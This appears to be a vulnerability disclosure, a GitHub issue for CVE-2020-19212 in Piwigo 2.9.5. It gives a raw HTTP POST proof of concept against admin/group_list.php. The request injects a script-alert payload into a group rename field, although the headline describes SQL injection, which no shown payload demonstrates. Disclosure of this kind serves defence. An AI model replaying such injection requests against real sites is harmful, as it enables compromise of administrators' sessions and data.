Headline
CVE-2020-19212: SQL injection in group_list.php · Issue #1009 · Piwigo/Piwigo
SQL Injection vulnerability in admin/group_list.php in piwigo v2.9.5, via the group parameter to delete.
POST /admin.php?page=group_list HTTP/1.1
Host: 10.150.10.186:30001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.150.10.186:30001/admin.php?page=group_list
Content-Type: application/x-www-form-urlencoded
Content-Length: 430
Cookie: pwg_display_thumbnail=no_display_thumbnail; pwg_id=hb609s43hqj1iqrkvlrvgne5q7
Connection: close
Upgrade-Insecure-Requests: 1
pwg_token=036e74fc33b5eee65c74f44b98c09e13&group_selection%5B%5D=1&selectAction=delete&rename_1=1%3E%3Cscript%3Ealert%28%2Fgroup%2F%29%3C%2Fscript%3E&merge=%E5%9C%A8%E9%80%99%E8%BC%B8%E5%85%A5%E6%96%B0%E7%9A%84%E7%BE%A4%E7%B5%84%E5%88%A5%E5%90%8D%E7%A8%B1&confirm_deletion=1&duplicate_1=%E5%9C%A8%E9%80%99%E8%BC%B8%E5%85%A5%E6%96%B0%E7%9A%84%E7%BE%A4%E7%B5%84%E5%88%A5%E5%90%8D%E7%A8%B1&submit=%E6%87%89%E7%94%A8%E5%8B%95%E4%BD%9C